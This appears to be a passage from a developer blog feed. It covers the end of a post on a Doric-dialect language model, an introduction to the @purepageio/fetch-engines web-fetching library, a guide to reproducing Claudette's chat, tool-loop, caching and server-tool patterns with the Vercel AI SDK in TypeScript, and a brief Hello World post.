that better reflects real conversational Doric. Next up I want to train a text-to-speech model to speak Doric aloud. For this I would need several hours of wide-ranging audio from multiple speakers with detailed transcripts including pauses and emotion indicators. Unsloth would be a [fine tool](https://docs.unsloth.ai/basics/text-to-speech-tts-fine-tuning) for this, but as always, the training data is the key. *If you are or know of someone who would want to help with either of these, please [get in touch](mailto:hi@siquick.com)* If you want to try the model, dataset, or notebook, you can find them here: [Model - GGUF](https://huggingface.co/franco334578/doric-12b-it-gguf)\ [Model - FP16](https://huggingface.co/franco334578/doric-12b-it-fp16)\ [LoRA Adapters](https://huggingface.co/franco334578/doric-12b-it-lora)\ [Dataset](https://huggingface.co/datasets/franco334578/doric-conversations)\ [Notebook on Colab](https://colab.research.google.com/drive/1VaW-ZOtzUIxE-PAhdvfhaB1gLOUKneua#scrollTo=dCWYtGmY7qQ-) --- # Introducing @purepageio/fetch-engines: reliable web fetching Extracting content from websites is unreliable. Plain HTTP requests miss content rendered by JavaScript, and bot detection can block automated traffic. Developers often rebuild the same glue code for retries, proxies, and headless browsers. `@purepageio/fetch-engines` packages these patterns into a robust API. It provides a lightweight `FetchEngine` for simple pages and a smart `HybridEngine` that starts with a fast request and automatically escalates to a full browser when needed. It simplifies fetching HTML, Markdown, or even raw files like PDFs. [**@purepageio/fetch-engines on npm**](https://www.npmjs.com/package/@purepageio/fetch-engines) ## Features * **Smart Engine Selection**: Use `FetchEngine` for speed on static sites or `HybridEngine` for reliability on complex, JavaScript-heavy pages. * **Unified API**: Fetch processed web pages with `fetchHTML()` or raw files with `fetchContent()`. * **Automatic Escalation**: The `HybridEngine` tries a simple fetch first and only falls back to a full browser (Playwright) if the request fails or the response looks like an empty SPA shell. * **Built-in Stealth & Retries**: The browser-based engine integrates stealth measures to avoid common bot detection, and all engines have configurable retries. * **Content Conversion**: `fetchHTML()` can be configured to return clean Markdown instead of HTML. * **Structured Content Extraction**: Supply a Zod schema to `fetchStructuredContent()` or the `StructuredContentEngine` and receive typed JSON generated via OpenAI. * **Raw File Handling**: `fetchContent()` retrieves any type of file - PDFs, images, APIs - returning the raw content as a Buffer or string. ## Quick start First, install the package and its browser dependencies. ```bash pnpm add @purepageio/fetch-engines pnpm exec playwright install ``` This example uses the `HybridEngine` to reliably fetch a potentially complex page. ```ts import { HybridEngine, FetchError } from "@purepageio/fetch-engines"; // Initialise the engine. HybridEngine is best for general use. const engine = new HybridEngine(); async function main() { try { const url = "https://quotes.toscrape.com/"; // A JS-heavy site const result = await engine.fetchHTML(url); console.log(`Fetched ${result.url}`); console.log(`Title: ${result.title}`); console.log(`HTML (excerpt): ${result.content.substring(0, 150)}...`); } catch (error) { if (error instanceof FetchError) { console.error(`Fetch failed: ${error.message} (Code: ${error.code})`); } } finally { // Shut down the browser instance managed by the engine. await engine.cleanup(); } } main(); ``` ## Structured content extraction Some crawls do not just need HTML - they need typed entities that can flow straight into a database or workflow. `@purepageio/fetch-engines` ships with `fetchStructuredContent()` and a `StructuredContentEngine` that combine Playwright-grade fetching with OpenAI-powered extraction. You describe the shape of the data with Zod, and the helper ensures the response matches that schema before handing it back. ```ts import { fetchStructuredContent } from "@purepageio/fetch-engines"; import { z } from "zod"; const articleSchema = z.object({ title: z.string(), summary: z.string(), author: z.string().optional(), }); async function fetchArticleSummary() { const result = await fetchStructuredContent( "https://example.com/press-release", articleSchema, { model: "gpt-4.1-mini" } ); console.log(result.data.summary); } ``` Behind the scenes the helper: * Runs the same HTTP-first workflow as the other engines, promoting tricky pages to Playwright automatically. * Sends the cleaned content and your schema to OpenAI, so you get structured data without juggling prompts. * Validates the response with Zod before returning it, which keeps downstream pipelines predictable. Set `OPENAI_API_KEY` in the environment before using structured extraction, and call `await engine.cleanup()` if you instantiate the long-lived `StructuredContentEngine`. ## Fetching Markdown and Raw Files (like PDFs) To get clean prose from an article, configure the engine to return Markdown. To download a PDF, use `fetchContent()` to get the raw file buffer. ```ts import { HybridEngine } from "@purepageio/fetch-engines"; import { writeFileSync } from "fs"; const engine = new HybridEngine(); async function fetchDocuments() { // 1. Fetch an article and convert it to Markdown const article = await engine.fetchHTML("https://example.com/blog/post", { markdown: true, }); if (article.content) { console.log(article.content); } // 2. Fetch a raw PDF file const pdf = await engine.fetchContent("https://example.com/report.pdf"); if (pdf.content instanceof Buffer) { // The library returns the raw file; parsing it is up to you writeFileSync("report.pdf", pdf.content); console.log("Downloaded report.pdf"); } await engine.cleanup(); } fetchDocuments(); ``` ## Choosing an engine * **`FetchEngine`**: Best for speed with trusted, static sites or APIs that return HTML. * **`HybridEngine`**: The recommended default. It offers the speed of a simple fetch with the reliability of a full browser fallback for dynamic sites. This project is open source. If you use it, please report issues and share ideas on the [GitHub repository](https://github.com/purepage/fetch-engines) to help guide its development. --- # Claudette Patterns for TypeScript: A Guide to the AI SDK **TL;DR:** Claudette gives Python developers an ergonomic way to work with Claude, featuring a stateful chat object, an automatic tool loop, and structured outputs. This guide shows how to recreate those same powerful patterns in TypeScript using the Vercel AI SDK. **Acknowledgement:** Claudette is an Answer.AI project that teaches through literate notebooks. Credit to its maintainers for a clean, well‑explained design. ([claudette.answer.ai](https://claudette.answer.ai/)) ## Recreating Claudette's Core Features in TypeScript | Pattern | Claudette (Python) | AI SDK (TypeScript) Implementation | | :--- | :--- | :--- | | **Multi-step Tools** | A `Chat.toolloop()` runs calls until a task is done. | Use `generateText` with a `stopWhen` condition. | | **Structured Output** | `Client.structured()` returns a typed Python object. | Use `generateObject` with a Zod or JSON schema. | | **Prompt Caching** | Helpers mark cacheable parts of a prompt. | Use `providerOptions` to enable caching with a TTL. | | **Server Tools** | Wires up tools like Text Editor and Web Search. | Attach provider tools for Text Editor, Web Search, etc. | *** ## 1. Pattern: Automatic Multi-step Tool Use A key feature in Claudette is the `toolloop`, which automatically executes tool calls and feeds the results back to the model until a task is complete. You can build the same loop in the AI SDK by defining tools and using `generateText` or `streamText` with a `stopWhen` condition. This tells the SDK to re-invoke the model with tool results until your condition is met, preventing runaway loops. ```ts // pnpm add ai @ai-sdk/anthropic zod import { streamText, tool, stepCountIs } from 'ai'; import { anthropic } from '@ai-sdk/anthropic'; import { z } from 'zod'; const add = tool({ description: 'Add two integers', inputSchema: z.object({ a: z.number(), b: z.number() }), execute: async ({ a, b }) => a + b, }); const result = await streamText({ model: anthropic('claude-4-sonnet-20250514'), tools: { add }, stopWhen: stepCountIs(5), // Stop after 5 steps prompt: 'What is (12345 + 67890) * 2? Use tools and explain.', }); for await (const chunk of result.textStream) process.stdout.write(chunk); ``` ## 2. Pattern: Strongly Typed Structured Outputs Claudette's `structured()` method is a convenient way to get typed Python objects from the model. The AI SDK provides `generateObject` for the same purpose. You provide a Zod schema, and the SDK handles sending the schema to the model, validating the response, and returning a typed object. ```ts // pnpm add ai @ai-sdk/openai zod import { generateObject } from 'ai'; import { openai } from '@ai-sdk/openai'; import { z } from 'zod'; const Person = z.object({ first: z.string(), last: z.string(), birth_year: z.number(), }); const { object } = await generateObject({ model: openai('gpt-4o-mini'), schema: Person, prompt: 'Extract data for Ada Lovelace.', }); ``` ## 3. Pattern: Effective Prompt Caching Claudette's documentation highlights how to cache large, repeated prompt sections to save on costs. In the AI SDK, you can achieve this using `providerOptions.anthropic.cacheControl`. This marks parts of a message as cacheable. Remember that Anthropic enforces minimum token thresholds, so this is most effective for large system prompts or RAG context. You can verify caching was successful by checking the `providerMetadata`. ```ts // pnpm add ai @ai-sdk/anthropic import { generateText } from 'ai'; import { anthropic } from '@ai-sdk/anthropic'; const result = await generateText({ model: anthropic('claude-sonnet-4-20250514'), messages: [ { role: 'system', content: 'Long, reusable instructions...', providerOptions: { anthropic: { cacheControl: { type: 'ephemeral' } } }, }, { role: 'user', content: 'User-specific question...' }, ], }); console.log(result.providerMetadata?.anthropic?.cacheCreationInputTokens); ``` ## 4. Pattern: Using Anthropic's Server Tools The AI SDK also provides access to Anthropic's server-side tools, like Text Editor and Web Search, which are explained in the Claudette notebooks. ### Implementing the Text Editor The Text Editor tool requires careful sandboxing. Your `execute` function is the safety boundary and must validate all paths and commands. ```ts // app/api/edit/route.ts // pnpm add ai @ai-sdk/anthropic import { NextRequest } from 'next/server'; import { generateText } from 'ai'; import { anthropic } from '@ai-sdk/anthropic'; import path from 'node:path'; const ROOT = path.resolve(process.cwd(), 'repo'); const safe = (p: string) => { const abs = path.resolve(ROOT, p); if (!abs.startsWith(ROOT)) throw new Error('Path outside allowed root'); return abs; }; const textEditor = anthropic.tools.textEditor_20250429({ execute: async ({ command, path: p, ...args }) => { const abs = safe(p); // ... safe implementation for 'create', 'view', 'str_replace' ... return 'unsupported command'; }, }); export async function POST(req: NextRequest) { const { prompt } = await req.json(); const result = await generateText({ model: anthropic('claude-4-sonnet-20250514'), tools: { str_replace_based_edit_tool: textEditor }, prompt, }); return new Response(result.text); } ``` ### Implementing Web Search To use Web Search, enable it in your Anthropic Console and then attach the provider-defined tool in your code. ```ts import { anthropic } from '@ai-sdk/anthropic'; import { generateText } from 'ai'; const webSearch = anthropic.tools.webSearch_20250305({ maxUses: 3 }); const result = await generateText({ model: anthropic('claude-4.1-opus-20250805'), prompt: 'Summarise the latest TypeScript release notes.', tools: { web_search: webSearch }, }); ``` --- # Hello World This is where I write about my learning, experiements, and other things.